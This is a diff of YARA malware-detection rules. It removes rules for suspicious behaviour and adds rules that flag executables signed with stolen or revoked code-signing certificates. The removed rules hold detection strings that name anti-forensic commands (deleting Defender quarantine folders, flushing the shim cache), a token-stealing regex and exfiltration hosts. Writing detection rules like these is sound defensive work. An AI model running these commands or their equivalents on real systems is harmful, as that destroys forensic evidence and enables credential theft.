+		id = "f9fd6478-0fe5-54b6-ba33-79c02eb9ad04"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L2323-L2337"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6444-L6455"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1cf82a8fb6c878cb3aaeaf36eb346b2f8038e166e8ce7b5c214769e475ae91de"
-		score = 40
-		quality = 29
+		logic_hash = "d55d9fe608d5ff357a3bcf700a3d8bd9556f83c7c792b50d2276228a77209346"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint1 = "2e20b7079e5d83e7987b2605db160d1561a0c07a"
+		hash1 = "284dc48fc2a66a1071117e5f7b2ad68fba4aae69f31cf68b6b950e6205b52dc0"
 		importance = 20
 
-	strings:
-		$s1 = "rmdir C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine\\Entries /S" ascii wide nocase
-		$s2 = "rmdir C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine\\Resources /S" ascii wide nocase
-		$s3 = "rmdir C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine\\ResourceData /S" ascii wide nocase
-		$r1 = "rmdir" ascii wide nocase
-		$p1 = "Microsoft\\Windows Defender\\Quarantine\\Entries /S" ascii wide nocase
-		$p2 = "Microsoft\\Windows Defender\\Quarantine\\Resources /S" ascii wide nocase
-		$p3 = "Microsoft\\Windows Defender\\Quarantine\\ResourceData /S" ascii wide nocase
-
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $s* ) or ( 1 of ( $r* ) and 2 of ( $p* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VMProtect Client " )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_Deleteshimcache : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_44Fe73F320Aa8B7B4F5Ca910Aa22333A : FILE
 {
 	meta:
-		description = "Detects executables embedding anti-forensic artifacts of deleting shim cache"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "32b185f2-a11e-522e-822e-7023698975f8"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "fb7a2f49-d5b4-59af-b64b-27624ff18323"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L2339-L2350"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6457-L6468"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4ecd9e4db082a464735e447f95175ec5b35164d42fce7be862400191c143aa23"
-		score = 40
-		quality = 37
+		logic_hash = "a456cd32eed6c1f037bc565e7a43f2a5a2237749afc31f6b7a8b8d7a657973c6"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "e952eb51416ab15c0a38b64a32348ed40b675043"
 		importance = 20
 
-	strings:
-		$s1 = "Rundll32.exe apphelp.dll,ShimFlushCache" ascii wide nocase
-		$s2 = "Rundll32 apphelp.dll,ShimFlushCache" ascii wide nocase
-		$m1 = ".dll,ShimFlushCache" ascii wide nocase
-		$m2 = "rundll32" ascii wide nocase
-
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $s* ) or all of ( $m* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Alpeks LLC" and pe.signatures [ i ] . serial == "44:fe:73:f3:20:aa:8b:7b:4f:5c:a9:10:aa:22:33:3a" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_Shredfilesteps : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_Df45B36C9D0Bd248C3F9494E7Ca822 : FILE
 {
 	meta:
-		description = "Detects executables embedding/copying file shredding steps"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "2a4ac767-8946-5e58-9087-aa1d3a97b5d5"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "95100ec5-01bf-5a5a-a703-b10d320beed1"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L2352-L2365"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6470-L6481"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9e784c1d06b232ac2de7318854a59b237aeb88d8e6670fe4ecc9f3230310088a"
-		score = 40
-		quality = 45
+		logic_hash = "40f4ad4183ca0bc76295c535a9286994ef0e3f8ac932372328016d543bb58ab5"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "4b1efa2410d9aab12af6c0b624a3738dd06d3353"
 		importance = 20
 
-	strings:
-		$s1 = { 55 00 00 00 aa 00 00 00 92 49 24 00 49 24 92 00
-                24 92 49 00 00 00 00 00 11 00 00 00 22 00 00 00
-                33 00 00 00 44 00 00 00 66 00 00 00 88 00 00 00
-                99 00 00 00 bb 00 00 00 cc 00 00 00 dd 00 00 00
-                ee 00 00 00 ff 00 00 00 6d b6 db 00 b6 db 6d 00
-                db 6d b6 }
-
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MPO STORITVE d.o.o." and pe.signatures [ i ] . serial == "df:45:b3:6c:9d:0b:d2:48:c3:f9:49:4e:7c:a8:22" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_PWS_Capturescreenshot
+
+rule DITEKSHEN_INDICATOR_KB_CERT_Adbb8Aebf8B53C6713Abaca38Be9Bf0A : FILE
 {
 	meta:
-		description = "Detects PowerShell script with screenshot capture capability"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "d769936a-a81d-5052-8b1b-7bd5a73b41db"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "b3edea3e-8844-58a5-a600-b0695869b2c3"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L2367-L2379"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6483-L6497"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "26e02d7dc242fb2c913b3a7c07e92c84becad62a4cdbae781bce948bfe0eb81b"
-		score = 40
-		quality = 45
-		tags = ""
+		logic_hash = "d5e85240df57bf3b5ec4f690943f71609aaf2fb2f751b2919b6024b4247cd571"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		thumbprint = "9f9b9f5a85d3005e4c613b6c2ba20b6d5d388645"
 		importance = 20
 
-	strings:
-		$encoder = ".ImageCodecInfo]::GetImageEncoders(" ascii nocase
-		$capture1 = ".Sendkeys]::SendWait(\"{PrtSc}\")" ascii nocase
-		$capture2 = ".Sendkeys]::SendWait('{PrtSc}')" ascii nocase
-		$access = ".Clipboard]::GetImage(" ascii nocase
-		$save = ".Save(" ascii nocase
-
 	condition:
-		$encoder and ( 1 of ( $capture* ) and ( $access or $save ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Konstant LLC" and ( pe.signatures [ i ] . serial == "ad:bb:8a:eb:f8:b5:3c:67:13:ab:ac:a3:8b:e9:bf:0a" or pe.signatures [ i ] . serial == "00:ad:bb:8a:eb:f8:b5:3c:67:13:ab:ac:a3:8b:e9:bf:0a" ) )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_PWS_Capturebrowserplugins
+
+rule DITEKSHEN_INDICATOR_KB_CERT_1Ffc9825644Caf5B1F521780C5C7F42C : FILE
 {
 	meta:
-		description = "Detects PowerShell script with browser plugins capture capability"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "9b1bb195-6e32-5f93-ba70-efcb21b26bb0"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "b9ed2db5-b7d4-5d74-bb11-1e8b1dfe1648"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L2381-L2394"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6499-L6510"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ac7be8663507e96ecb224f7f09f9092069eab5967598e33c107fa341de86bc77"
-		score = 40
-		quality = 45
-		tags = ""
+		logic_hash = "9866608a02a043e6873c6fbd231cd733b3b5a1e5b77e3205e5cf53f5ae2bcadd"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		thumbprint = "4e7e022c7bb6bd90a75674a67f82e839d54a0a5e"
 		importance = 20
 
-	strings:
-		$s1 = "$env:APPDATA +" ascii nocase
-		$s2 = "[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27}|mfa\\.[\\w-]{84}" ascii nocase
-		$s3 = "\\leveldb" ascii nocase
-		$o1 = ".Match(" ascii nocase
-		$o2 = ".Contains(" ascii nocase
-		$o3 = ".Add(" ascii nocase
-
 	condition:
-		2 of ( $s* ) and 2 of ( $o* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ACTIVUS LIMITED" and pe.signatures [ i ] . serial == "1f:fc:98:25:64:4c:af:5b:1f:52:17:80:c5:c7:f4:2c" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_IMG_Embedded_B64_EXE : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_3112C69D460C781Fd649C71E61Bfec82 : FILE
 {
 	meta:
-		description = "Detects images with specific base64 markers and/or embedding (reversed) base64-encoded executables"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "c620b461-5ad8-530b-a3e1-f75a9e30534e"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "a8092e36-92f9-5cb0-a427-74d40a39d94f"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L2396-L2413"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6512-L6523"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0fe1328aba3b30820e3885c87a93e52306bd25abc5912378a12e1213a686cd39"
-		score = 40
-		quality = 45
+		logic_hash = "9662a01369bc01367bcae7813b3fcb3050721471dd247885bcab8918de7c6b99"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "7ec961d2c69f7686e33f39d497a5e3039e512cf3"
 		importance = 20
 
-	strings:
-		$m1 = "<<BASE64_START>>" ascii
-		$m2 = "<<BASE64_END>>" ascii
-		$m3 = "BASE64_START" ascii
-		$m4 = "BASE64_END" ascii
-		$m5 = "BASE64-START" ascii
-		$m6 = "BASE64-END" ascii
-		$m7 = "BASE64START" ascii
-		$m8 = "BASE64END" ascii
-		$h1 = "TVqQA" ascii
-		$h2 = "AQqVT" ascii
-
 	condition:
-		( uint32( 0 ) == 0xd8ff or uint32( 0 ) == 0x474e5089 or uint16( 0 ) == 0x4d42 ) and ( ( 2 of ( $m* ) ) or ( 1 of ( $h* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KREATURHANDLER BJARNE ANDERSEN ApS" and pe.signatures [ i ] . serial == "31:12:c6:9d:46:0c:78:1f:d6:49:c7:1e:61:bf:ec:82" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Transfersh_URL : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_F64E5B34Dc0E4893495D3B9Fd9Cde4B7 : FILE
 {
 	meta:
-		description = "Detects files referencing the transfer.sh file sharing website"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "15c6ba05-199d-52ba-98bf-7e8a8eda0295"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "d408b662-6328-55a8-ab64-42ea8f18c1cf"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L2415-L2423"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6525-L6536"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "45b16f853bcd9c492468bc478d0a7eeecd261ae47b5b00bb1e4a79788fdec7a1"
-		score = 40
-		quality = 43
+		logic_hash = "497e63e4a19fa5b05d1098177dc73ae2255d4608d97e1001461dc4f8edced169"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "49373674eb2190c227455c9b5833825fe01f957a"
 		importance = 20
 
-	strings:
-		$s1 = "//transfer.sh/get/" ascii wide nocase
-
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMASoft" and pe.signatures [ i ] . serial == "f6:4e:5b:34:dc:0e:48:93:49:5d:3b:9f:d9:cd:e4:b7" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_References_Publicserviceinterface : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_6Bec31A0A40D2E834E51Ae704E1Bf9D3 : FILE
 {
 	meta:
-		description = "Detect executables referencing public and free service interface testing and dev services as means of CnC"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "f6ac752b-0afc-5834-82b4-4dbcfded2f3a"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "9228c13e-b380-5867-ad1f-e483c8977196"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L2450-L2461"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6538-L6549"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2a7b4fe7ddb41a7ae895a2ac8e9bb5eda61f5b86ca35575be32d65611e2d0a9e"
-		score = 40
-		quality = 37
+		logic_hash = "f1fdd6e76deea106db9fc4ef0916b2cecd6edb3849847946f15c194a9028a76e"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "7a236872302156c58d493b63a1607a09c4f1d0b8"
 		importance = 20
 
-	strings:
-		$s1 = "mockbin.org/bin" ascii wide nocase
-		$s2 = "run.mocky.io/v3" ascii wide nocase
-		$s3 = "webhook.site/" ascii wide nocase
-		$s4 = "devtunnels.ms/" ascii wide nocase
-
 	condition:
-		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f or uint16( 0 ) == 0xfacf ) and 1 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "whatsupfuckers" and pe.signatures [ i ] . serial == "6b:ec:31:a0:a4:0d:2e:83:4e:51:ae:70:4e:1b:f9:d3" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_56203Db039Adbd6094B6A142C5E50587 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_9Fac361Ee3304079 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "b3e56f78-e79a-52e3-b29e-1f566946609e"
+		id = "4143adb3-bd23-549c-b862-0db3583be161"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3-L14"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6551-L6565"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "38380bc1a22b8d0fe851f76d2ecadba638f10b01873be44766124fb738e23d71"
+		logic_hash = "a32fe70e2242e587007c3985420c3bea25d35aff37f62881cc386bdeff22ca93"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "e438c77483ecab0ff55cc31f2fd2f835958fad80"
+		thumbprint = "2168032804def9cdbc1fc1a669377d494832f4ec"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bccabdacabbdcda" and pe.signatures [ i ] . serial == "56:20:3d:b0:39:ad:bd:60:94:b6:a1:42:c5:e5:05:87" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "2021945 Ontario Inc." and ( pe.signatures [ i ] . serial == "9f:ac:36:1e:e3:30:40:79" or pe.signatures [ i ] . serial == "00:9f:ac:36:1e:e3:30:40:79" ) )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_B5F34B7C326C73C392B515Eb4C2Ec80E : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_1895De749994D0Db : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "f5d19333-4aee-52d3-aeac-822b39ec653a"
+		id = "2a8129ac-9838-5798-a115-ec03c1b3c205"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L16-L27"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6567-L6578"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "553ef777cb7a93934caa53cc9acdc37fc4cbe2a28ae320f4a7f10b2a4073d675"
+		logic_hash = "0b5e7998bd6303a12a8681bca88b7802caa08d9272196b830ffac5573b6e3772"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "9d35805d6311fd2fe6c49427f55f0b4e2836bbc5"
+		thumbprint = "069b9cb52a325a829aba7731ead939bc4ebf3743"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cdaadbffbaedaabbdedfdbfebf" and pe.signatures [ i ] . serial == "b5:f3:4b:7c:32:6c:73:c3:92:b5:15:eb:4c:2e:c8:0e" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "2021945 Ontario Inc." and pe.signatures [ i ] . serial == "18:95:de:74:99:94:d0:db" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_0A1Dc99E4D5264C45A5090F93242A30A : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_28B691272719B1Ee : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "8efea9da-a3ae-5af3-83b2-cac5baa4fa89"
+		id = "5a8cf540-701f-5f94-b630-ccbaa62abfdd"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L29-L40"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6580-L6591"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "cb230503e17e93f78b04723c32d7ce66bdf146846e0208d268eebc0e446a6917"
+		logic_hash = "b2224f8107e7c50334c7e12963e4e37c0a6824c49842afb314c12d6de9d6bc5e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "17680b1ebaa74f94272957da11e914a3a545f16f"
+		thumbprint = "5dcbc94a2fdcc151afa8c55f24d0d5124d3b6134"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "K & D KOMPANI d.o.o." and pe.signatures [ i ] . serial == "0a:1d:c9:9e:4d:52:64:c4:5a:50:90:f9:32:42:a3:0a" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "2021945 Ontario Inc." and pe.signatures [ i ] . serial == "28:b6:91:27:27:19:b1:ee" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_0D53690631Dd186C56Be9026Eb931Ae2 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00E3B80C0932B52A708477939B0D32186F : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "f0afbdf4-68db-522f-95d7-cd76aa7b9710"
+		id = "41525cdd-f65a-5aad-bd99-1cdcf8b11981"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L42-L53"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6593-L6607"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "645c2340fe7e7ce992f3f655d5058834d0df6a64ea20ef7794893a592124c55e"
+		logic_hash = "a0a95c20c5c82b460ddef686731d1053181cb5066bbb4f585a4f402f50efe030"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "c5d1e46a40a8200587d067814adf0bbfa09780f5"
+		thumbprint = "1d2b5d4f0de1d7ce4abf82fdc58adc43bc28adee"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "STA-R TOV" and pe.signatures [ i ] . serial == "0d:53:69:06:31:dd:18:6c:56:be:90:26:eb:93:1a:e2" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BISOYETUTU LTD LIMITED" and ( pe.signatures [ i ] . serial == "e3:b8:0c:09:32:b5:2a:70:84:77:93:9b:0d:32:18:6f" or pe.signatures [ i ] . serial == "00:e3:b8:0c:09:32:b5:2a:70:84:77:93:9b:0d:32:18:6f" ) )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_Fd8C468Cc1B45C9Cfb41Cbd8C835Cc9E : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00C667Ffe3A5B0A5Ae7Cf3A9E41682E91B : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "836af706-3a82-5aaf-9a96-244eef5820b2"
+		id = "509dcc22-1202-5b6e-a602-6b06c282b28d"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L55-L66"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6609-L6623"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "495ec6dbfdec3f608e387280e2d34093bb4965f5ada7c101e3119ae970eaf80d"
+		logic_hash = "6d3d0cfb42758f917b003f7979f7123c1789c9e9b4e01b1aebf265a298eac08f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "08fc56a14dcdc9e67b9a890b65064b8279176057"
+		thumbprint = "6b66ba34ff01e0dab6e68ba244d991578a69c4ad"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Pivo ZLoun s.r.o." and pe.signatures [ i ] . serial == "fd:8c:46:8c:c1:b4:5c:9c:fb:41:cb:d8:c8:35:cc:9e" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NAILS UNLIMITED LIMITED" and ( pe.signatures [ i ] . serial == "c6:67:ff:e3:a5:b0:a5:ae:7c:f3:a9:e4:16:82:e9:1b" or pe.signatures [ i ] . serial == "00:c6:67:ff:e3:a5:b0:a5:ae:7c:f3:a9:e4:16:82:e9:1b" ) )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_32Fbf8Cfa43Dca3F85Efabe96Dfefa49 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_Sagsanlgs : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "9a228e0e-256b-547d-af6d-960089f2f803"
+		id = "b08e46a5-de76-5711-98dc-2144c7bbe66f"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L68-L79"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6639-L6650"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7e53dcd2e10285f710f1fb2355d77db3507ce346e8d0f26843ca8df2271a6e9e"
+		logic_hash = "3ab10d8605f501f3c4f3a3afa31c5b001e03354846ff1953e7e36ceb9b564bf6"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "498d63bf095195828780dba7b985b71ab08e164f"
+		thumbprint = "a6073f35adbdfe26ddc0f647953acc3a9bd33962"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Foxstyle LLC" and pe.signatures [ i ] . serial == "32:fb:f8:cf:a4:3d:ca:3f:85:ef:ab:e9:6d:fe:fa:49" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Sagsanlgs" and pe.signatures [ i ] . serial == "00" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_7E0Ccda0Ef37Acef6C2Ebe4538627E5C : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00989A33B72A2Aa29E32D0A5E155C53963 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "89006ac2-5cbc-5e7f-9ca6-51316b8d4bfd"
